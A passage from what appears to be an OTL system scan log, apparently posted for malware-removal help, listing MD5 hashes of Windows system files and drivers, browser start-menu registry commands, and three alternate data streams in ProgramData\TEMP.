Corporation) MD5=DC0B4553D089E2BD07AEBD9EA30BEAFB -- C:\swsetup\Drivers\64\HDD\IaStor.sys [2010/01/08 22:45:26 | 000,409,112 | ---- | M] (Intel Corporation) MD5=DC0B4553D089E2BD07AEBD9EA30BEAFB -- C:\swsetup\INTELMSM\Winall\Driver64\IaStor.sys [color=#A23BEC]< MD5 for: IASTORV.SYS >[/color] [2011/03/11 06:38:51 | 000,332,160 | ---- | M] (Intel Corporation) MD5=5CD5F9A5444E6CDCB0AC89BD62D8B76E -- C:\Windows\System32\drivers\iaStorV.sys [2011/03/11 06:38:51 | 000,332,160 | ---- | M] (Intel Corporation) MD5=5CD5F9A5444E6CDCB0AC89BD62D8B76E -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_x86_neutral_0bcee2057afcc090\iaStorV.sys [2011/03/11 06:38:51 | 000,332,160 | ---- | M] (Intel Corporation) MD5=5CD5F9A5444E6CDCB0AC89BD62D8B76E -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.17577_none_b0daddb9e6380745\iaStorV.sys [2011/03/11 06:28:00 | 000,332,160 | ---- | M] (Intel Corporation) MD5=778D0E6D7D9EBA0C403BADBAAD41DB20 -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.21680_none_b152a892ff64119f\iaStorV.sys [2010/11/20 13:29:54 | 000,332,160 | ---- | M] (Intel Corporation) MD5=A3CAE5D281DB4CFF7CFF8233507EE5AD -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.17514_none_b118bc63e60a139a\iaStorV.sys [2010/11/20 13:29:54 | 000,332,160 | ---- | M] (Intel Corporation) MD5=A3CAE5D281DB4CFF7CFF8233507EE5AD -- C:\Windows\System32\DriverStore\FileRepository\iastorv.inf_x86_neutral_668286aa35d55928\iaStorV.sys [2010/11/20 13:29:54 | 000,332,160 | ---- | M] (Intel Corporation) MD5=A3CAE5D281DB4CFF7CFF8233507EE5AD -- C:\Windows\winsxs\x86_iastorv.inf_31bf3856ad364e35_6.1.7601.17514_none_b118bc63e60a139a\iaStorV.sys [color=#A23BEC]< MD5 for: NETLOGON.DLL >[/color] [2010/11/20 13:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_ffbf212e963c0162\netlogon.dll [2010/11/20 13:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\System32\netlogon.dll [2010/11/20 13:20:28 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\winsxs\x86_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_ffbf212e963c0162\netlogon.dll [color=#A23BEC]< MD5 for: NVSTOR.SYS >[/color] [2011/03/11 06:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\drivers\nvstor.sys [2011/03/11 06:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_0276fc3b3ea60d41\nvstor.sys [2011/03/11 06:39:00 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=4380E59A170D88C4F1022EFF6719A8A4 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17577_none_3ba44e691d6eb11d\nvstor.sys [2011/03/11 06:28:10 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=66D468654A58594F5F3BA63D5AD5B1AF -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.21680_none_3c1c1942369abb77\nvstor.sys [2010/11/20 13:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_3be22d131d40bd72\nvstor.sys [2010/11/20 13:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\System32\DriverStore\FileRepository\nvraid.inf_x86_neutral_dd659ed032d28a14\nvstor.sys [2010/11/20 13:30:06 | 000,143,744 | ---- | M] (NVIDIA Corporation) MD5=9283C58EBAA2618F93482EB5DABCEC82 -- C:\Windows\winsxs\x86_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_3be22d131d40bd72\nvstor.sys [color=#A23BEC]< MD5 for: SCECLI.DLL >[/color] [2010/11/20 13:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_3a154c47375d881d\scecli.dll [2010/11/20 13:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\System32\scecli.dll [2010/11/20 13:21:04 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\winsxs\x86_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_3a154c47375d881d\scecli.dll [color=#A23BEC]< MD5 for: SERVICES.EXE >[/color] [2009/07/14 02:14:36 | 000,259,072 | ---- | M] (Microsoft Corporation) MD5=5F1B6A9C35D3D5CA72D6D6FDEF9747D6 -- C:\Windows\System32\services.exe [2009/07/14 02:14:36 | 000,259,072 | ---- | M] (Microsoft Corporation) MD5=5F1B6A9C35D3D5CA72D6D6FDEF9747D6 -- C:\Windows\winsxs\x86_microsoft-windows-s..s-servicecontroller_31bf3856ad364e35_6.1.7600.16385_none_cf36168b2e9c967b\services.exe [color=#A23BEC]< MD5 for: SVCHOST.EXE >[/color] [2009/07/14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\System32\svchost.exe [2009/07/14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe [color=#A23BEC]< MD5 for: WININIT.EXE >[/color] [2009/07/14 02:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\System32\wininit.exe [2009/07/14 02:14:45 | 000,096,256 | ---- | M] (Microsoft Corporation) MD5=B5C5DCAD3899512020D135600129D665 -- C:\Windows\winsxs\x86_microsoft-windows-wininit_31bf3856ad364e35_6.1.7600.16385_none_30c90ef265a43c13\wininit.exe [color=#A23BEC]< MD5 for: WINLOGON.EXE >[/color] [2010/11/20 13:17:54 | 000,286,720 | ---- | M] (Microsoft Corporation) MD5=6D13E1406F50C66E2A95D97F22C47560 -- C:\Windows\SoftwareDistribution\Download\e5556aeb28e014a0a0c9d20064d91946\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_71ca6b0233339500\winlogon.exe [2010/11/20 13:17:54 | 000,286,720 | ---- | M] (Microsoft Corporation) MD5=6D13E1406F50C66E2A95D97F22C47560 -- C:\Windows\System32\winlogon.exe [2010/11/20 13:17:54 | 000,286,720 | ---- | M] (Microsoft Corporation) MD5=6D13E1406F50C66E2A95D97F22C47560 -- C:\Windows\winsxs\x86_microsoft-windows-winlogon_31bf3856ad364e35_6.1.7601.17514_none_71ca6b0233339500\winlogon.exe [color=#A23BEC]< hklm\software\clients\startmenuinternet|command /rs >[/color] HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\Windows\System32\ie4uinit.exe" -show [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\Windows\System32\ie4uinit.exe" -reinstall [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\Windows\System32\ie4uinit.exe" -hide [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation) [color=#A23BEC]< hklm\software\clients\startmenuinternet|command /64 /rs >[/color] HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\HideIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /HideShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ShowIconsCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /ShowShortcuts [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\InstallInfo\\ReinstallCommand: "C:\Program Files\Mozilla Firefox\uninstall\helper.exe" /SetAsDefaultAppGlobal [2014/02/13 02:38:10 | 000,874,520 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\open\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\properties\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -preferences [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\FIREFOX.EXE\shell\safemode\command\\: "C:\Program Files\Mozilla Firefox\firefox.exe" -safe-mode [2014/02/13 01:36:25 | 000,275,568 | ---- | M] (Mozilla Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ShowIconsCommand: "C:\Windows\System32\ie4uinit.exe" -show [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\ReinstallCommand: "C:\Windows\System32\ie4uinit.exe" -reinstall [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\InstallInfo\\HideIconsCommand: "C:\Windows\System32\ie4uinit.exe" -hide [2014/02/06 10:34:32 | 000,208,896 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\naom\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" -extoff [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation) HKEY_LOCAL_MACHINE\software\clients\startmenuinternet\IEXPLORE.EXE\shell\open\command\\: "C:\Program Files\Internet Explorer\iexplore.exe" [2014/02/06 23:24:01 | 000,808,152 | ---- | M] (Microsoft Corporation) [color=#E56717]========== Alternate Data Streams ==========[/color] @Alternate Data Stream - 128 bytes -> C:\ProgramData\TEMP:D346F792 @Alternate Data Stream - 118 bytes -> C:\ProgramData\TEMP:373E1720 @Alternate Data Stream - 116 bytes -> C:\ProgramData\TEMP:3DA1C741 < End of report >